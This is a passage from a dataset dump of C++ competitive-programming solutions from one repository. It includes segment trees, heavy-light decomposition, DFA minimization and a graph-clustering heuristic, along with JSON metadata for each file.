"max_line_length": 174, "num_lines": 293, "path": "/CodeForce/0192/E.cpp", "repo_name": "Igorjan94/CF", "src_encoding": "UTF-8", "text": "// Igorjan94, template version from 13 October 2017. C++17 version, modified 18 march 2020 (writeln<tuple>, whole->all) {{{\n#include <bits/stdc++.h>\n#ifdef ONLINE_JUDGE\n#pragma GCC target(\"avx2,bmi,bmi2,lzcnt,popcnt\")\n#endif\n\nusing namespace std;\n\n#define FOR(i, m, n) for (int i = m; i < (int) (n); ++i)\n#define ROF(i, m, n) for (int i = m; i >= (int) (n); --i)\n#define forn(i, n) for (int i = 0; i < (int) (n); ++i)\n#define fori1(n) for (int i = 1; i < (int) (n); ++i)\n#define forj1(n) for (int j = 1; j < (int) (n); ++j)\n#define fori(n) for (int i = 0; i < (int) (n); ++i)\n#define forj(n) for (int j = 0; j < (int) (n); ++j)\n#define SZ(a) int(size(a))\n\ntypedef pair<int, int> pii;\ntypedef vector<int> vi;\ntypedef long long ll;\n\n#define pb push_back\n#define all(a) begin(a), end(a)\n#define ints(a...) int a; readln(a)\n\n[[maybe_unused]] const int MOD = 1000000007;\n[[maybe_unused]] const int INTMAX = numeric_limits<int>::max();\n\n#define ttt12i template<class T1, class T2> inline\n#define ttti template<class T> inline\n\nvoid writeln(){cout<<\"\\n\";}ttti void print(T&& a);ttti void priws(T&& a);ttti void read(T& a);\ntemplate<class... Args> inline void readln(Args&... args){(read(args),...);}\ntemplate<class H, class...T> inline void writeln(H&& h,T&&...t){priws(h);(print(t),...);writeln();}\n\n//Igorjan\n//segmentTree\n//0-indexed, [l..r]\ntemplate<typename T>\nstruct segmentTree\n{\n int n;\n vector<T> t;\n vector<T> add;\n //vector<T> pos;\n function<T(const T&, const T&)> f = [](const T& a, const T& b) { return min(a, b); };\n T NEITRAL_ELEMENT = numeric_limits<T>::max();\n \n void push(int v, int tl, int tr)\n {\n if (add[v] == 0) return;\n\n t[v] += add[v];\n if (tl != tr)\n add[v * 2] += add[v],\n add[v * 2 + 1] += add[v];\n add[v] = 0;\n }\n\n void build(const vector<T>& a, int v, int l, int r)\n {\n if (l == r)\n {\n t[v] = a[l];\n //pos[v] = l;\n }\n else \n {\n int m = (l + r) / 2;\n build(a, v * 2, l, m);\n build(a, v * 2 + 1, m + 1, r);\n T left = t[v * 2];\n T right = t[v * 2 + 1];\n\n //if (left > right)\n //pos[v] = pos[v * 2];\n //else\n //pos[v] = pos[v * 2 + 1];\n t[v] = f(left, right);\n }\n };\n \n segmentTree(const vector<T>& a)\n {\n n = a.size();\n t.resize(n * 4 + 10);\n add.resize(n * 4 + 10, 0);\n //pos.resize(n * 4 + 10, 0);\n build(a, 1, 0, n - 1);\n }\n \n void update(int l, int r, T value)\n {\n update(1, 0, n - 1, l, r, value);\n }\n \n void update(int v, int tl, int tr, int l, int r, T value) \n {\n push(v, tl, tr);\n if (l > r)\n return;\n if (tl == l && tr == r)\n {\n t[v] += value;\n if (tl != tr)\n add[v * 2] += value,\n add[v * 2 + 1] += value;\n }\n else \n {\n int tm = (tl + tr) / 2;\n update(v * 2, tl, tm, l, min(r, tm), value);\n update(v * 2 + 1, tm + 1, tr, max(l, tm + 1), r, value);\n T left = t[v * 2];\n T right = t[v * 2 + 1];\n\n //if (left > right)\n //pos[v] = pos[v * 2];\n //else\n //pos[v] = pos[v * 2 + 1];\n t[v] = f(left, right);\n }\n }\n\n T get(int l, int r)\n {\n return get(1, 0, n - 1, l, r);\n }\n\n T get(int v, int tl, int tr, int l, int r) \n {\n push(v, tl, tr);\n if (l > r) return NEITRAL_ELEMENT;\n\n if (tl == l && tr == r)\n return t[v];\n else \n {\n int tm = (tl + tr) / 2;\n T left = get(v * 2, tl, tm, l, min(r, tm));\n T right = get(v * 2 + 1, tm + 1, tr, max(l, tm + 1), r);\n return f(left, right);\n }\n }\n\n};\n\n//heavyLight\ntemplate<typename T>\nstruct heavyLight \n{\n vector<T> a;\n segmentTree<T> tree;\n\n int n;\n int paths = 0;\n vector<int> sizes; //Size of subtree\n vector<int> depth; //Depth of vertex\n vector<int> parent; //Parent vertex\n vector<int> path; //Path to which vertex belongs (like disjoint set union)\n vector<int> heavy; //Heavy child if exists else -1\n vector<int> index; //Index of vertex in segment tree\n vector<int> first; //Highest vertex of path\n\n heavyLight(const vector<vector<int>>& g, const vector<T>& a) : tree(a) \n {\n this->a = a;\n n = g.size();\n sizes.resize(n, 1);\n depth.resize(n, 0);\n parent.resize(n, -1);\n path.resize(n, -1);\n heavy.resize(n, -1);\n index.resize(n, -1);\n first.resize(n, -1);\n\n auto dfs = [&](auto dfs, int u, int p) -> void\n {\n for (const int& v: g[u]) if (v != p)\n {\n depth[v] = depth[u] + 1;\n parent[v] = u;\n dfs(dfs, v, u);\n sizes[u] += sizes[v];\n }\n for (const int& v: g[u]) if (v != p)\n if (sizes[v] * 2 >= sizes[u])\n heavy[u] = v;\n };\n dfs(dfs, 0, -1);\n\n int cur = -1;\n fori(n)\n if (heavy[i] == -1)\n {\n int u = i;\n vector<int> currentPath;\n while (true)\n {\n currentPath.pb(u);\n path[u] = paths;\n int nu = parent[u];\n if (nu == -1 || heavy[nu] != u)\n break;\n u = nu;\n }\n\n reverse(all(currentPath));\n for (int v: currentPath)\n first[v] = u,\n index[v] = ++cur;\n ++paths;\n }\n }\n\n void upd(int u, int v, int one = 1)\n {\n if (u > v)\n swap(u, v);\n if (one == -1)\n {\n int x = min(u, v) + 1;\n int y = max(u, v);\n u = x;\n v = y;\n }\n tree.update(u, v, 1);\n }\n\n void update(int u, int v) \n {\n int l = path[u];\n int r = path[v];\n if (l == r)\n return upd(index[u], index[v], -1);\n if (depth[first[u]] < depth[first[v]])\n swap(u, v);\n upd(index[u], index[first[u]]);\n update(parent[first[u]], v);\n }\n};\n\n//}}}\n\nvoid run()\n{\n ints(n);\n vector<vector<int>> g(n);\n vector<array<int, 3>> edges;\n vector<int> ans(n - 1);\n fori(n - 1)\n {\n ints(u, v); --u; --v;\n g[u].pb(v);\n g[v].pb(u);\n edges.pb({u, v, i});\n }\n heavyLight hld(g, vector(n, 0));\n ints(q);\n fori(q)\n {\n ints(u, v); --u; --v;\n hld.update(u, v);\n }\n for (auto& [u, v, i]: edges)\n {\n int x = hld.depth[u] < hld.depth[v] ? v : u;\n x = hld.index[x];\n ans[i] = hld.tree.get(x, x);\n }\n writeln(ans);\n}\n\n//{{{\nint main()\n{\n ios_base::sync_with_stdio(false); cin.tie(0);\n run();\n cerr << fixed << setprecision(0) << \"Execution time = \" << 1000.0 * clock() / CLOCKS_PER_SEC << \"ms\\n\";\n return 0;\n}\n\n#define a _a\n#define n _n\nttt12i ostream&operator<<(ostream&os,pair<T1,T2>const&a);\ntemplate<typename T,typename D=decltype(*begin(declval<T>())),typename enable_if<!is_same<T,basic_string<char>>::value>::type* =nullptr>\nostream&operator<<(ostream&os,T const&a){auto it=begin(a);if(it!=end(a))os<<*it++;while(it!=end(a))os<<\"\\n \"[is_fundamental<typename T::value_type>::value]<<*it++;return os;}\nttt12i ostream&operator<<(ostream&os,pair<T1,T2>const&a){return os<<a.first<<\" \"<<a.second;}\nttt12i istream&operator>>(istream&is,pair<T1,T2>&a){return is>>a.first>>a.second;}\nttti istream&operator>>(istream&is,vector<T>&a){fori(a.size())is>>a[i];return is;}\nttti void print(T&&a){cout<<\" \"<<a;}\nttti void priws(T&&a){cout<<a;}\nttti void read(T&a){cin>>a;} //}}}\n" }, { "alpha_fraction": 0.3877171277999878, "alphanum_fraction": 0.3965570628643036, "avg_line_length": 25.75103759765625, "blob_id": "41108876bf3c3aa403faa76be22e5cbbf4086ba4", "content_id": "1605296f031e3e1008b38db8f57783c2a06ab65d", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 6448, "license_type": "no_license", "max_line_length": 928, "num_lines": 241, "path": "/trash/mimimization.cpp", "repo_name": "Igorjan94/CF", "src_encoding": "UTF-8", "text": "\n#include <cstdlib>\n#include <iostream>\n#include <stdio.h>\n#include <vector>\n#include <set>\n#include <algorithm>\n#include <queue>\n#include <string>\n#include <stack>\n\n#define enter printf(\"\\n\");\n#define pb push_back\n#define ll long long\n#define fors(it, r) for (set<int>::iterator it = r.begin(); it != r.end(); it++)\n#define forvit(it, r) for (vector<int>::iterator it = r.begin(); it != r.end(); it++)\n#define forv(i, vector) for (int i = 0; i < vector.size(); i++)\n#define forn(i, n) for (int i = 0; i < n; i++)\n#define vi vector<int>\n#define sigma 26\n\nusing namespace std;\nint INF = 1000000007;\nstring FILENAME = \"minimization\";\nstring FILEINPUT = FILENAME;\n\nvoid writeln(int a){printf(\"%d\\n\", a);}void writeln(int a, int b){printf(\"%d %d\\n\", a, b);}void writeln(int a, int b, int c){printf(\"%d %d %d\\n\", a, b, c);}void writeln(int a, int b, int c, int d){printf(\"%d %d %d %d\\n\", a, b, c, d);}void write(int a){printf(\"%d\", a);}void write(int a, int b){printf(\"%d %d\", a, b);}void write(int a, int b, int c){printf(\"%d %d %d\", a, b, c);}void write(int a, int b, int c, int d){printf(\"%d %d %d %d\", a, b, c, d);}void read(int &a){scanf(\"%d\", &a);}void read(int &a, int &b){scanf(\"%d %d\", &a, &b);}void read(int &a, int &b, int &c){scanf(\"%d %d %d\", &a, &b, &c);}void read(int &a, int &b, int &c, int &d){scanf(\"%d %d %d %d\", &a, &b, &c, &d);}void readln(int &a){scanf(\"%d\\n\", &a);}void readln(int &a, int &b){scanf(\"%d %d\\n\", &a, &b);}void readln(int &a, int &b, int &c){scanf(\"%d %d %d\\n\", &a, &b, &c);}void readln(int &a, int &b, int &c, int &d){scanf(\"%d %d %d %d\\n\", &a, &b, &c, &d);}\nvoid readln(vector<int> &f, int n){int x;for (int i = 1; i <= n; i++){read(x);f.push_back(x);}}void writeln(vector<int> &f){for (int i = 0; i < f.size(); i++)printf(\"%d%c\", f[i], i == f.size() - 1 ? '\\n' : ' ');}\n\nstruct dsu\n{\n vi a, id;\n int n, m;\n dsu(int n)\n {\n this->n = n;\n id.resize(n, n);\n forn(i, n)\n a.pb(i);\n }\n\n int get(int i)\n {\n return a[i] == i ? i : a[i] = get(a[i]);\n }\n\n void uni(int i, int j)\n {\n i = get(i);\n j = get(j);\n if (i == j)\n return;\n a[i] = a[j];\n }\n\n void getId()\n {\n int counter = 0;\n forn(i, n)\n if (id[get(i)] == n)\n id[get(i)] = counter++;\n m = counter;\n }\n};\n\nstruct aut\n{\n int n, m, k;\n vector<bool> ok, useful;\n vector< vi > a;\n vector< vector< vi > > b;\n\n aut(int n)\n {\n this->n = n;\n m = 0;\n k = 0;\n ok.resize(n + 2, false);\n a.resize(n + 2);\n forn(i, n)\n a[i].resize(sigma, n);\n }\n\n aut()\n {\n int x, y;\n char c;\n readln(n, m, k);\n ok.resize(n + 2, false);\n useful.resize(n + 2, false);\n a.resize(n + 2);\n b.resize(n + 2);\n queue<int> q;\n forn(i, n + 1)\n a[i].resize(sigma + 1, n),\n b[i].resize(sigma + 1);\n forn(i, k)\n {\n read(x);\n ok[x - 1] = true;\n q.push(x - 1);\n useful[x - 1] = true;\n }\n forn(i, m)\n {\n scanf(\"%d %d %c\\n\", &x, &y, &c);\n a[x - 1][c - 'a'] = y - 1;\n b[y - 1][c - 'a'].pb(x - 1);\n }\n while (!q.empty())\n {\n int v = q.front();\n q.pop();\n useful[v] = true;\n forn(i, sigma)\n forvit(j, b[v][i])\n if (*j != n && !useful[*j])\n q.push(*j);\n }\n forn(i, n)\n forn(j, sigma)\n if (a[i][j] == n)\n b[n][j].pb(i);\n// forn(i, n)\n // printf(\"%d \", (int)useful[i]);\n // cout << endl;\n }\n\n void write()\n {\n writeln(n, m, k);\n forn(i, n)\n if (ok[i])\n printf(\"%d \", i + 1);\n printf(\"\\n\");\n forn(i, n)\n forn(j, sigma)\n if (a[i][j] != n)\n printf(\"%d %d %c\\n\", i + 1, a[i][j] + 1, 'a' + j);\n }\n};\n\nvoid debug(aut& a, vector< vector<bool> >& p)\n{\n printf(\" \");\n forn(i, a.n + 1)\n printf(\"%c \", 'A' + i);\n printf(\"\\n\");\n forn(i, a.n + 1)\n {\n printf(\"%c \", 'A' + i);\n forn(j, a.n + 1)\n printf(\"%d%c\", (int)p[i][j], j == a.n ? '\\n' : ' ');\n }\n}\n\naut minimization(aut& a)\n{\n //aut b(a.n);\n vector< vector<bool> > p;\n vi id;\n p.resize(a.n + 1);\n id.resize(a.n, -1);\n forn(i, a.n)\n p[i].resize(a.n, false);\n queue< pair<int, int> > q;\n forn(i, a.n)\n p[i][i] = true;\n forn(i, a.n + 1)\n for (int j = i + 1; j <= a.n; j++)\n if (a.ok[i] != a.ok[j] || !a.useful[i] || !a.useful[j])\n q.push({i, j}),\n p[i][j] = true,\n p[j][i] = true;\n debug(a, p);\n int l, f;\n while (!q.empty())\n {\n f = q.front().first;\n l = q.front().second;\n q.pop();\n forn(i, sigma)\n if (a.b[f][i].size() > 0 && a.b[l][i].size() > 0)\n forvit(j, a.b[f][i])\n forvit(k, a.b[l][i])\n if (!p[*j][*k])\n q.push({*j, *k}),\n p[*j][*k] = true,\n p[*k][*j] = true;\n }\n debug(a, p);\n /*dsu ds(a.n);\n forn(i, a.n)\n forn(j, a.n)\n if (!p[i][j])\n ds.uni(i, j);*/\n int counter = 0;\n forn(i, a.n)\n {\n if (id[i] == -1)\n id[i] = counter++;\n\n forn(j, a.n)\n if (!p[i][j])\n id[j] = id[i];\n }\n// writeln(b.n, counter);\n forn(i, a.n)\n if (!a.useful[i])\n counter--;\n aut b(counter);//b.n = counter;\n forn(i, a.n)\n {\n if (!a.useful[i])\n continue;\n if (a.ok[i])\n if (!b.ok[id[i]])\n b.ok[id[i]] = true,\n b.k++;\n forn(j, sigma)\n if (a.a[i][j] != a.n && b.a[id[i]][j] == a.n && a.useful[a.a[i][j]])\n b.a[id[i]][j] = id[a.a[i][j]],\n b.m++;\n }\n// writeln(100500);\n// debug(a, p);\n return b;\n}\n\nvoid run()\n{\n aut a;\n aut mn = minimization(a);\n mn.write();\n}\n\nint main()\n{\n freopen(FILEINPUT.append(\".in\").c_str(), \"r\", stdin); //freopen(FILENAME.append(\".out\").c_str(), \"w\", stdout);\n run();\n return 0;\n}\n" }, { "alpha_fraction": 0.47355473041534424, "alphanum_fraction": 0.49815496802330017, "avg_line_length": 26.100000381469727, "blob_id": "4e333f532ec8ab7670edc9c69387b5a4e1d4f7d2", "content_id": "935b84dbef3260e70301acb2be0a10274fafcf69", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 1626, "license_type": "no_license", "max_line_length": 67, "num_lines": 60, "path": "/TopCoder/TC641/A.cpp", "repo_name": "Igorjan94/CF", "src_encoding": "UTF-8", "text": "//template igorjan94 version from 05 December 2014\n#include <bits/stdc++.h>\n\n#define forit(it, r) for (auto it = r.begin(); it != r.end(); it++)\n#define FOR(i, m, n) for (int i = m; i < n; ++i)\n#define ROF(i, m, n) for (int i = m; i >= n; --i)\n#define forn1(i, n) for (int i = 1; i < n; ++i)\n#define forn(i, n) for (int i = 0; i < n; ++i)\n#define fori1(n) for (int i = 1; i < n; ++i)\n#define forj1(n) for (int j = 1; j < n; ++j)\n#define fori(n) for (int i = 0; i < n; ++i)\n#define forj(n) for (int j = 0; j < n; ++j)\n\n#define fst first\n#define cnd second\n#define pb push_back\n#define ll long long\n#define vi vector<int>\n#define pii pair<int, int>\n#define vll vector<long long>\n#define vvi vector<vector<int> >\n#define pll pair<long long, long long>\n#define whole(a) a.begin(), a.end()\n\n#define argmax(a) max_element(whole(a)) - (a).begin()\n#define argmin(a) min_element(whole(a)) - (a).begin()\n\n#ifndef ONLINE_JUDGE\n#define lld I64d\n#endif\n\n#define FILENAME \"input\"\n#define INF 1000000007\n#define DOUBLEFORMAT \"%f\"\n\nusing namespace std;\n\n#define method int meet(int t, vi q, vi p)\n\n#define classname BuyingTshirts\n\nclass classname\n{\n public :\n method\n {\n int ans = 0;\n int sum1 = 0, sum2 = 0;\n fori(q.size())\n {\n sum1 += q[i];\n sum2 += p[i];\n if (sum1 >= t && sum2 >= t)\n ans++;\n sum1 %= t;\n sum2 %= t;\n }\n return ans;\n }\n};\n" }, { "alpha_fraction": 0.45078831911087036, "alphanum_fraction": 0.46961578726768494, "avg_line_length": 30.408653259277344, "blob_id": "5eb61c434c9e1f0ab3ad3e685cba6ca94170a94f", "content_id": "f596b1176af00cef285ef7619e00fa0ac8449817", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 6533, "license_type": "no_license", "max_line_length": 174, "num_lines": 208, "path": "/CodeForce/1378/A.cpp", "repo_name": "Igorjan94/CF", "src_encoding": "UTF-8", "text": "// Igorjan94, template version from 13 October 2017. C++17 version, modified 18 march 2020 (writeln<tuple>, whole->all) {{{\n#include <bits/stdc++.h>\n\nusing namespace std;\n\n#define FOR(i, m, n) for (int i = m; i < (int) (n); ++i)\n#define ROF(i, m, n) for (int i = m; i >= (int) (n); --i)\n#define forn(i, n) for (int i = 0; i < (int) (n); ++i)\n#define fori1(n) for (int i = 1; i < (int) (n); ++i)\n#define forj1(n) for (int j = 1; j < (int) (n); ++j)\n#define fori(n) for (int i = 0; i < (int) (n); ++i)\n#define forj(n) for (int j = 0; j < (int) (n); ++j)\n#define SZ(a) int(size(a))\n\ntypedef pair<int, int> pii;\ntypedef vector<int> vi;\ntypedef long long ll;\n\n#define pb push_back\n#define all(a) begin(a), end(a)\n#define ints(a...) int a; readln(a)\n\n[[maybe_unused]] const int MOD = 1000000007;\n[[maybe_unused]] const int INTMAX = numeric_limits<int>::max();\n\n#define ttt12i template<class T1, class T2> inline\n#define ttti template<class T> inline\n\nvoid writeln(){cout<<\"\\n\";}ttti void print(T&& a);ttti void priws(T&& a);ttti void read(T& a);\ntemplate<class... Args> inline void readln(Args&... args){(read(args),...);}\ntemplate<class H, class...T> inline void writeln(H&& h,T&&...t){priws(h);(print(t),...);writeln();}\n\n//Igorjan\n//}}}\n\n\nstatic const int ITERATIONS = 1;\nstatic const int N = 200000;\nvector<vector<int>> g(N);\nvector<int> d(N);\nunordered_set<int> V;\nint E = 0;\n\ndouble getScore(const vector<vector<int>>& x)\n{\n unordered_set<int> V1;\n for (const auto& c: x)\n for (const int& u: c)\n V1.insert(u);\n if (V1 != V)\n {\n writeln(\"Not all vertices are in components or some are included more than once\");\n exit(1);\n }\n\n auto ein = [&](const vector<int>& c) {\n unordered_set s(all(c));\n int edges = 0;\n for (const int& u: c)\n for (const int& v: g[u])\n edges += s.find(v) != s.end();\n return edges / 2.0;\n };\n\n auto eout = [&](const vector<int>& c) {\n int s = 0;\n for (const int& u: c)\n s += d[u];\n return s / 2.0 / E;\n };\n\n auto density = [&](const vector<int>& c) {\n int n = c.size();\n if (n == 1)\n return 1.0;\n else\n return ein(c) * 2.0 / n / (n - 1);\n };\n\n auto modularity = [&](const vector<vector<int>>& x) {\n double ans = 0.0;\n for (const auto& c: x)\n ans += ein(c) / E - pow(eout(c), 2.0);\n return ans;\n };\n \n auto regularization = [&](const vector<vector<int>>& x) {\n double ans = 0.0;\n for (const auto& c: x)\n ans += density(c);\n return 0.5 * (ans / x.size() - x.size() * 1.0 / V.size());\n };\n\n return (1.0 + modularity(x) + regularization(x)) * 100000.0;\n}\n\nvoid run()\n{\n mt19937 rng(chrono::steady_clock::now().time_since_epoch().count());\n cerr << fixed << setprecision(3);\n int u, v;\n while (cin >> u >> v)\n ++E,\n V.insert(u),\n V.insert(v),\n d[u]++,\n d[v]++,\n g[u].pb(v),\n g[v].pb(u);\n int n = SZ(V);\n vector<vector<int>> ans;\n double answer = 0;\n forn(q, ITERATIONS)\n {\n vector<vector<int>> cur;\n\n vector<int> used(n, -1);\n set<pii> degrees;\n fori(n) degrees.emplace(-d[i], i);\n while (degrees.size())\n {\n auto [_, u] = *degrees.begin();\n degrees.erase(degrees.begin());\n if (used[u] != -1) continue;\n used[u] = cur.size();\n cur.pb({u});\n for (const int& v: g[u])\n if (used[v] == -1)\n used[v] = used[u],\n cur[used[u]].pb(v);\n }\n\n int lastSize = 0;\n forn(qqq, 15)\n {\n set<pii> sizes;\n fori(cur.size())\n sizes.emplace(cur[i].size(), i);\n if (lastSize == cur.size()) break;\n lastSize = cur.size();\n cerr << \"COMPS: \" << lastSize << endl;\n while (!sizes.empty())\n {\n auto [sz, comp] = *sizes.begin();\n sizes.erase(sizes.begin());\n map<int, int> m;\n for (int u: cur[comp])\n for (int v: g[u])\n m[used[v]]++;\n int toMerge = -1;\n int X = -1;\n\n if (m.size() >= 80)\n continue;\n for (const auto& [k, v]: m)\n if (k != comp)\n if (v > X)\n X = v, toMerge = k;\n //if (X > 1)\n //cerr << X << \" \" << sz << endl;\n if (X < m[comp] || toMerge == -1 || (sz > 1 && X < sz * sqrt(3))) continue;\n for (int u: cur[comp])\n used[u] = toMerge,\n cur[toMerge].pb(u);\n cur[comp].clear();\n }\n for (int i = 0; i < SZ(cur); )\n if (cur[i].size() == 0)\n swap(cur[i], cur.back()),\n cur.pop_back();\n else\n ++i;\n fori(cur.size())\n for (int u: cur[i])\n used[u] = i;\n }\n\n double temp = getScore(cur);\n cerr << \"ITERATION \" << (q + 1) << \" / \" << ITERATIONS << \", curScore \" << temp << \", maxScore \" << answer << endl;\n if (temp > answer)\n answer = temp,\n ans = cur;\n }\n for (const auto& u: ans)\n if (u.size())\n writeln(u);\n}\n\n//{{{\nint main()\n{\n ios_base::sync_with_stdio(false);\n run();\n cerr << fixed << setprecision(0) << \"Execution time = \" << 1000.0 * clock() / CLOCKS_PER_SEC << \"ms\\n\";\n return 0;\n}\n\n#define a _a\n#define n _n\nttt12i ostream&operator<<(ostream&os,pair<T1,T2>const&a);\ntemplate<typename T,typename D=decltype(*begin(declval<T>())),typename enable_if<!is_same<T,basic_string<char>>::value>::type* =nullptr>\nostream&operator<<(ostream&os,T const&a){auto it=begin(a);if(it!=end(a))os<<*it++;while(it!=end(a))os<<\"\\n \"[is_fundamental<typename T::value_type>::value]<<*it++;return os;}\nttt12i ostream&operator<<(ostream&os,pair<T1,T2>const&a){return os<<a.first<<\" \"<<a.second;}\nttt12i istream&operator>>(istream&is,pair<T1,T2>&a){return is>>a.first>>a.second;}\nttti istream&operator>>(istream&is,vector<T>&a){fori(a.size())is>>a[i];return is;}\nttti void print(T&&a){cout<<\" \"<<a;}\nttti void priws(T&&a){cout<<a;}\nttti void read(T&a){cin>>a;} //}}}\n" }, { "alpha_fraction": 0.4635503590106964, "alphanum_fraction": 0.4833982586860657, "avg_line_length": 29.286516189575195, "blob_id": "2f9d99f6debfabaecca89dc2c77eb73babaf18d9", "content_id": "2c4e1cafaa9f14f164dd67b0213a6eab70f5cc22", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 5391, "license_type": "no_license", "max_line_length": 174, "num_lines": 178, "path": "/2020/snws5/D.cpp", "repo_name": "Igorjan94/CF", "src_encoding": "UTF-8", "text": "// Igorjan94, template version from 13 October 2017. C++17 version, modified 14 september 2019 (writeln<T>, main) {{{\n#include <bits/stdc++.h>\n\nusing namespace std;\n\n#define FOR(i, m, n) for (int i = m; i < (int) (n); ++i)\n#define ROF(i, m, n) for (int i = m; i >= (int) (n); --i)\n#define forn(i, n) for (int i = 0; i < (int) (n); ++i)\n#define fori1(n) for (int i = 1; i < (int) (n); ++i)\n#define forj1(n) for (int j = 1; j < (int) (n); ++j)\n#define fori(n) for (int i = 0; i < (int) (n); ++i)\n#define forj(n) for (int j = 0; j < (int) (n); ++j)\n#define SZ(a) int(size(a))\n\ntypedef pair<int, int> pii;\ntypedef vector<int> vi;\ntypedef long long ll;\n\n#define pb push_back\n#define whole(a) begin(a), end(a)\n#define next next__\n#define prev prev__\n#define count count__\n\n#define ints(a...) int a; readln(a)\n#define wr(args...) err(#args, args)\n\n#define ttt12i template<class T1, class T2> inline\n#define tthti template<class H, class...T> inline\n#define ttta template<class... Args> inline\n#define ttti template<class T> inline\n\nconst int MOD = 1000000007;\nconst int INTMAX = numeric_limits<int>::max();\n\nvoid writeln(){cout<<\"\\n\";}ttti void print(T&& a);ttti void priws(T&& a);ttti void read(T& a);\nttta void readln(Args&... args){(read(args),...);}tthti void writeln(H&& h,T&&...t){priws(h);(print(t),...);writeln();}\nvector<string>split(string&s,string d){vector<string>v;size_t p=0;while((p=s.find(d))!=string::npos)v.pb(s.substr(0,p)),s.erase(0,p+d.length());v.pb(s);return v;}\nttta void err(string v,Args...args){auto vv=split(v,\", \");auto it=vv.begin();(writeln(*it++,\"=\",args),...);}\n\n//Igorjan\n//segmentTree\n//0-indexed, [l..r]\ntemplate<typename T>\nstruct segmentTree\n{\n int n;\n vector<vector<T>> t, prefix;\n vector<T> mx, pos;\n\n void build(vector<T>& a, int v, int l, int r)\n {\n if (l == r)\n t[v] = {a[l]},\n prefix[v].pb(a[l]);\n else \n {\n int m = (l + r) / 2;\n build(a, v * 2, l, m);\n build(a, v * 2 + 1, m + 1, r);\n merge(t[v * 2].begin(), t[v * 2].end(), t[v * 2 + 1].begin(), t[v * 2 + 1].end(), back_inserter(t[v]));\n for (T& x: t[v]) prefix[v].pb(prefix[v].back() + x);\n }\n };\n\n segmentTree(vector<T>& a)\n {\n n = a.size();\n t.resize(n * 4);\n prefix.resize(n * 4, vector<T>(1, 0));\n mx.resize(n * 4);\n pos.resize(n * 4);\n build(a, 1, 0, n - 1);\n }\n\n T get(int l, int r, T x)\n {\n return get(1, 0, n - 1, l, r, 0, x);\n }\n\n T get(int v, int tl, int tr, int l, int r, int curmx, T x) {\n curmx += mx[v];\n if (l > r)\n return 0;\n if (l == tl && tr == r) {\n int new_pos = upper_bound(t[v].begin() + pos[v], t[v].end(), x - curmx) - t[v].begin();\n T s = (SZ(t[v]) - new_pos) * x;\n T p = prefix[v][new_pos] - prefix[v][pos[v]];\n p += curmx * (new_pos - pos[v]);\n s += pos[v] * min(x, curmx);\n pos[v] = new_pos;\n mx[v] -= x;\n wr(l, r, p, s, curmx, x);\n writeln();\n return s + p;\n }\n int tm = (tl + tr) / 2;\n return get(v * 2, tl, tm, l, min(r, tm), curmx, x) + get(v * 2 + 1, tm + 1, tr, max(l, tm + 1), r, curmx, x);\n }\n\n void update(int l, int r, T value)\n {\n update(1, 0, n - 1, l, r, value);\n }\n\n void update(int v, int tl, int tr, int l, int r, T add) {\n if (l > r)\n return;\n if (l == tl && tr == r)\n mx[v] += add;\n else {\n int tm = (tl + tr) / 2;\n update(v * 2, tl, tm, l, min(r, tm), add);\n update(v * 2 + 1, tm + 1, tr, max(l, tm + 1), r, add);\n }\n }\n};\n\n//}}}\n\nvoid run()\n{\n ints(n);\n vi a(n);\n readln(a);\n segmentTree<int> s(a);\n\n writeln();\n fori1(n * 2)\n writeln(i, s.t[i]);\n\n ints(q);\n forn(_, q)\n {\n ints(t, i, j, k);\n --i;\n --j;\n if (t == 1)\n {\n s.update(i, j, k);\n FOR(w, i, j + 1)\n a[w] += k;\n }\n else\n {\n int sum = 0;\n FOR(w, i, j + 1)\n {\n sum += min(a[w], k);\n a[w] = max(0, a[w] - k);\n }\n wr(sum);\n writeln(s.get(i, j, k));\n }\n writeln(a);\n }\n}\n\n//{{{\nint main()\n{\n ios_base::sync_with_stdio(false);\n run();\n cerr << fixed << setprecision(0) << \"Execution time = \" << 1000.0 * clock() / CLOCKS_PER_SEC << \"ms\\n\";\n return 0;\n}\n\n#define a _a\n#define n _n\nttt12i ostream&operator<<(ostream&os,pair<T1,T2>const&a);\ntemplate<typename T,typename D=decltype(*begin(declval<T>())),typename enable_if<!is_same<T,basic_string<char>>::value>::type* =nullptr>\nostream&operator<<(ostream&os,T const&a){auto it=begin(a);if(it!=end(a))os<<*it++;while(it!=end(a))os<<\"\\n \"[is_fundamental<typename T::value_type>::value]<<*it++;return os;}\nttt12i ostream&operator<<(ostream&os,pair<T1,T2>const&a){return os<<a.first<<\" \"<<a.second;}\nttt12i istream&operator>>(istream&is,pair<T1,T2>&a){return is>>a.first>>a.second;}\nttti istream&operator>>(istream&is,vector<T>&a){fori(a.size())is>>a[i];return is;}\nttti void print(T&&a){cout<<\" \"<<a;}\nttti void priws(T&&a){cout<<a;}\nttti void read(T&a){cin>>a;} //}}}\n" }, { "alpha_fraction": 0.3637327551841736, "alphanum_fraction": 0.38388124108314514, "avg_line_length": 20.454545974731445, "blob_id": "387bb7a23417aad9701391caca27cc2185327953", "content_id": "274e7dd6168affb2d8890cd43080f0e15cfb4715", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 943, "license_type": "no_license", "max_line_length": 46, "num_lines": 44, "path": "/trains/neerc/neerc.ifmo.ru.train.2014.10.28/BWA.cpp", "repo_name": "Igorjan94/CF", "src_encoding": "UTF-8", "text": "#include <bits/stdc++.h>\n \n#define mp make_pair\n#define pb push_back\n#define all(a) (a).begin(), (a).end()\n#define sz(a) (int)a.size()\n#define fst first\n#define snd second\n#define fori(n) for(int i = 0; i < n; ++i)\n#define fori1(n) for(int i = 1; i < n; ++i)\n#define forj(n) for(int j = 0; j < n; ++j)\n \nusing namespace std;\n \nvector <pair <int, int> > ans;\nint a[1239];\n \nint main()\n{\n int n, k;\n cin >> n >> k;\n for (int i = 0; i < n; ++i)\n cin >> a[i];\n cout << \"Yes\" << endl;\n if (n == k)\n for (int i = 0; i < n; ++i){\n if (a[i] + 1)\n cout << a[i] << \" \" << i + 1;\n else\n cout << i + 1 << \" \" << i + 1;\n cout << endl;\n }\n else {\n for (int i = 0; i < n; ++i){\n if (a[i] + 1)\n cout << a[i] << \" \" << 1;\n else\n cout << 1 << \" \" << 1;\n cout << endl;\n }\n }\n \n \n}" }, { "alpha_fraction": 0.38357529044151306, 